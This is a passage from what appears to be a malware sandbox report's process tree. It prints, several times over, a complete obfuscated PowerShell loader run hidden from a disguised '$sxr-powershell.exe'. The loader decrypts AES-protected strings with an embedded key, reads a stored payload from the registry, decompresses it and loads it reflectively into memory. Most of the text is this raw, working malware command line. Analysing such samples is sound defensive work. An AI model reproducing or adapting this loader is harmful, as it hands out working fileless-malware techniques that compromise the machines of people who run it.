$WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:6708
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:6528
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:6864
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 